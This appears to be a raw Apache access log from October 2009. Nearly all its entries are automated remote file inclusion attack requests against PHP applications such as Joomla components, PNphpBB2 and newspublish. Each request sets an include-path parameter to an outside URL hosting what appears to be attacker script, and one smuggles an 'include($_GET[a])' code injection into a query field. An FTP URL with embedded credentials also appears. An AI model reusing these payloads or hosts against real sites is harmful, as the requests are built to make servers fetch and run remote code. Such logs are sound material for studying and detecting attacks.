200.144.1.134 - - [18/Oct/2009:04:14:16 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
222.239.255.101 - - [18/Oct/2009:04:14:18 -0400] "GET /?sourcedir=ftp://michigan:mifruit103011.52.244.86/public_html/v6id.txt???? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
222.239.255.101 - - [18/Oct/2009:04:14:18 -0400] "GET /logs/access_log.Q109051800%20/?sourcedir=ftp://michigan:mifruit103011.52.244.86/public_html/v6id.txt???? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
190.97.219.4 - - [18/Oct/2009:04:14:18 -0400] "GET /logs/access_log.Q109080200%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:14:18 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
222.239.255.101 - - [18/Oct/2009:04:14:18 -0400] "GET /logs/?sourcedir=ftp://michigan:mifruit103011.52.244.86/public_html/v6id.txt???? HTTP/1.1" 200 22322 "-" "libwww-perl/5.79"
200.144.1.134 - - [18/Oct/2009:04:14:20 -0400] "GET /logs/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
190.97.219.4 - - [18/Oct/2009:04:14:21 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:14:22 -0400] "GET /logs/access_log.Q109080200%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:14:27 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
220.100.96.65 - - [18/Oct/2009:04:14:28 -0400] "GET /logs/access_log.Q109063000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ownzz.100free.com/idzim.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.65"
220.100.96.65 - - [18/Oct/2009:04:14:29 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ownzz.100free.com/idzim.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
77.242.37.212 - - [18/Oct/2009:04:14:29 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:14:29 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
220.100.96.65 - - [18/Oct/2009:04:14:29 -0400] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ownzz.100free.com/idzim.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.65"
190.97.219.4 - - [18/Oct/2009:04:14:30 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:15:05 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:15:19 -0400] "GET /logs/access_log.Q109062000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:15:30 -0400] "GET /logs/access_log.Q109062000%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:15:34 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:15:34 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
77.242.37.212 - - [18/Oct/2009:04:15:34 -0400] "GET /logs/error_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:15:42 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:15:45 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.218.228.226 - - [18/Oct/2009:04:16:01 -0400] "GET //include/postgres.php?inc_dir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
201.218.228.226 - - [18/Oct/2009:04:16:01 -0400] "GET /logs/access_log.Q109080100//include/postgres.php?inc_dir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
201.218.228.226 - - [18/Oct/2009:04:16:01 -0400] "GET /logs//include/postgres.php?inc_dir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
190.97.219.4 - - [18/Oct/2009:04:16:46 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://www.chamjota.com//fx29id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
189.72.11.130 - - [18/Oct/2009:04:16:51 -0400] "GET /logs/error_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
189.72.11.130 - - [18/Oct/2009:04:16:53 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
189.72.11.130 - - [18/Oct/2009:04:16:54 -0400] "GET /logs/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
147.46.116.207 - - [18/Oct/2009:04:17:03 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:17:03 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:17:03 -0400] "GET /logs/access_log.Q109080500/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:17:03 -0400] "GET /logs/access_log.Q109080100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
65.38.18.81 - - [18/Oct/2009:04:17:14 -0400] "GET /logs/access_log.Q109063000//oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:17:14 -0400] "GET /logs/access_log.Q109063000//oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:17:14 -0400] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:17:14 -0400] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:17:15 -0400] "GET /logs/error_log.Q109063000//oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:17:15 -0400] "GET /logs/error_log.Q109063000//oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:17:47 -0400] "GET //oneadmin/newspublish/samplenewspublish.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:17:47 -0400] "GET //oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:17:47 -0400] "GET //oneadmin/newspublish/samplenewspublish.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:17:47 -0400] "GET //oneadmin/newspublish/include.php?path[docroot]=http://triton.100free.com/mic22? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:18:05 -0400] "GET /logs/access_log.Q109062900//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://triton.100free.com/mic22? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:18:05 -0400] "GET /logs/access_log.Q109062900//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://triton.100free.com/mic22? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:18:05 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://triton.100free.com/mic22? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:18:05 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://triton.100free.com/mic22? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:18:05 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://triton.100free.com/mic22? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:04:18:05 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://triton.100free.com/mic22? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
87.104.34.140 - - [18/Oct/2009:04:18:58 -0400] "GET /logs/access_log.Q109071900//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ownzz.100free.com/idzim.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
220.100.96.65 - - [18/Oct/2009:04:19:02 -0400] "GET /logs/access_log.Q109071900//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ownzz.100free.com/idzim.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.65"
209.59.12.99 - - [18/Oct/2009:04:19:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.151.132.176 - - [18/Oct/2009:04:19:25 -0400] "GET /logs/access_log.Q109052200//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://dubnahome.ru//one.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
110.45.147.248 - - [18/Oct/2009:04:19:36 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:19:36 -0400] "GET /logs/access_log.Q109080800/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:19:36 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
140.113.223.66 - - [18/Oct/2009:04:20:14 -0400] "GET /logs/access_log.Q109063000%20%20//newspublish/include.php?path[docroot]=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
140.113.223.66 - - [18/Oct/2009:04:20:14 -0400] "GET /logs//newspublish/include.php?path[docroot]=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
140.113.223.66 - - [18/Oct/2009:04:20:14 -0400] "GET //newspublish/include.php?path[docroot]=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
140.113.223.66 - - [18/Oct/2009:04:20:14 -0400] "GET /logs/access_log.Q109071400%20%20//newspublish/include.php?path[docroot]=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
174.143.3.188 - - [18/Oct/2009:04:20:15 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
174.143.3.188 - - [18/Oct/2009:04:20:15 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
174.143.3.188 - - [18/Oct/2009:04:20:15 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
174.143.3.188 - - [18/Oct/2009:04:20:15 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
66.228.136.80 - - [18/Oct/2009:04:20:22 -0400] "GET /logs/access_log.Q109081700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
220.100.96.65 - - [18/Oct/2009:04:20:32 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ownzz.100free.com/idzim.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.65"
189.72.11.130 - - [18/Oct/2009:04:20:33 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
207.210.70.162 - - [18/Oct/2009:04:20:41 -0400] "GET /phphtml.php?htmlclass_path=http://www.corclan.com/clanlan/shoutbox.do?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
207.210.70.162 - - [18/Oct/2009:04:20:42 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.corclan.com/clanlan/shoutbox.do?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
207.210.70.162 - - [18/Oct/2009:04:20:42 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.corclan.com/clanlan/shoutbox.do?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
200.144.1.134 - - [18/Oct/2009:04:20:59 -0400] "GET /logs/access_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
207.210.70.162 - - [18/Oct/2009:04:21:06 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.corclan.com/clanlan/shoutbox.do?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.218.228.226 - - [18/Oct/2009:04:21:22 -0400] "GET /logs/access_log.Q109080200%20%20//include/postgres.php?inc_dir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
123.125.66.121 - - [18/Oct/2009:04:21:29 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
87.104.34.140 - - [18/Oct/2009:04:21:43 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://ownzz.100free.com/idzim.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
147.46.116.207 - - [18/Oct/2009:04:21:54 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:21:54 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:21:54 -0400] "GET /logs/access_log.Q109080500/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:21:54 -0400] "GET /logs/access_log.Q109080100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
201.218.228.226 - - [18/Oct/2009:04:21:55 -0400] "GET /logs/access_log.Q109080100%20%20//include/postgres.php?inc_dir=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.228.136.80 - - [18/Oct/2009:04:22:34 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.127.253.142 - - [18/Oct/2009:04:23:41 -0400] "GET /logs/access_log.Q109051100///?_zb_path=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.127.253.142 - - [18/Oct/2009:04:23:41 -0400] "GET ///?_zb_path=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
210.127.253.142 - - [18/Oct/2009:04:23:41 -0400] "GET /logs///?_zb_path=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 200 22328 "-" "Mozilla/5.0"
66.249.71.51 - - [18/Oct/2009:04:23:21 -0400] "GET /logs/error_log.Q109090100 HTTP/1.1" 200 3510814 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.129.220.182 - - [18/Oct/2009:04:24:02 -0400] "GET /phphtml.php?htmlclass_path=http://www.chrisexpo.com/css/style?? HTTP/1.1" 404 209 "-" "libwww-perl/5.65"
209.59.12.99 - - [18/Oct/2009:04:24:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.147.248 - - [18/Oct/2009:04:24:09 -0400] "GET /logs/access_log.Q109080800%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
210.110.97.12 - - [18/Oct/2009:04:24:12 -0400] "GET ///?_zb_path=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Oct/2009:04:24:12 -0400] "GET /logs/access_log.Q109051100///?_zb_path=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Oct/2009:04:24:12 -0400] "GET /logs///?_zb_path=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 200 22328 "-" "Mozilla/5.0"
210.127.253.142 - - [18/Oct/2009:04:24:33 -0400] "GET /logs/access_log.Q109090700///?_zb_path=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.181.7.57 - - [18/Oct/2009:04:25:04 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
207.210.70.162 - - [18/Oct/2009:04:25:05 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.corclan.com/clanlan/shoutbox.do?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
207.210.70.162 - - [18/Oct/2009:04:25:17 -0400] "GET /logs/access_log.Q109052400%20%20/phphtml.php?htmlclass_path=http://www.corclan.com/clanlan/shoutbox.do?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Oct/2009:04:25:36 -0400] "GET /logs/access_log.Q109090700///?_zb_path=http://mallboro.fileave.com/readme.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.129.220.182 - - [18/Oct/2009:04:25:40 -0400] "GET /logs/access_log.Q109052300/phphtml.php?htmlclass_path=http://www.chrisexpo.com/css/style?? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
203.129.220.182 - - [18/Oct/2009:04:25:41 -0400] "GET /phphtml.php?htmlclass_path=http://www.chrisexpo.com/css/style?? HTTP/1.1" 404 209 "-" "libwww-perl/5.65"
203.129.220.182 - - [18/Oct/2009:04:25:42 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.chrisexpo.com/css/style?? HTTP/1.1" 404 214 "-" "libwww-perl/5.65"
203.129.220.182 - - [18/Oct/2009:04:27:22 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://www.chrisexpo.com/css/style?? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
147.46.116.207 - - [18/Oct/2009:04:27:54 -0400] "GET /logs/access_log.Q109062400%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:27:54 -0400] "GET /logs/access_log.Q109080500%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
140.113.223.66 - - [18/Oct/2009:04:28:14 -0400] "GET /logs/access_log.Q109063000//newspublish/include.php?path[docroot]=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
140.113.223.66 - - [18/Oct/2009:04:28:14 -0400] "GET /logs/access_log.Q109071400//newspublish/include.php?path[docroot]=http://www.ratniki.org.ru//dkp/1itemstats/statserver/office1.jpg??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.249.71.230 - - [18/Oct/2009:04:28:32 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
147.46.116.207 - - [18/Oct/2009:04:28:41 -0400] "GET /logs/access_log.Q109062400%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:28:41 -0400] "GET /logs/access_log.Q109080500%20%20/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.71.230 - - [18/Oct/2009:04:28:32 -0400] "GET /logs/error_log.Q109061600 HTTP/1.1" 200 3174227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [18/Oct/2009:04:29:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
189.43.142.10 - - [18/Oct/2009:04:29:32 -0400] "GET /logs/error_log.Q109060500/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:29:36 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:29:36 -0400] "GET /logs/access_log.Q109081200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:29:36 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
110.45.147.248 - - [18/Oct/2009:04:29:36 -0400] "GET /logs/access_log.Q109090600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
189.43.142.10 - - [18/Oct/2009:04:29:36 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
189.43.142.10 - - [18/Oct/2009:04:29:39 -0400] "GET /logs/index.php?pag=http://fffmatheus.justfree.com/safeof.txt?????????? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
146.164.41.5 - - [18/Oct/2009:04:31:08 -0400] "GET /index.php?pag=http://fffmatheus.justfree.com/safeof.txt??????? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
174.143.3.188 - - [18/Oct/2009:04:31:10 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
174.143.3.188 - - [18/Oct/2009:04:31:10 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
174.143.3.188 - - [18/Oct/2009:04:31:10 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
174.143.3.188 - - [18/Oct/2009:04:31:10 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
147.46.116.207 - - [18/Oct/2009:04:31:16 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
147.46.116.207 - - [18/Oct/2009:04:31:16 -0400] "GET /logs/access_log.Q109082000/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cvctrade.com///components/com_user/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
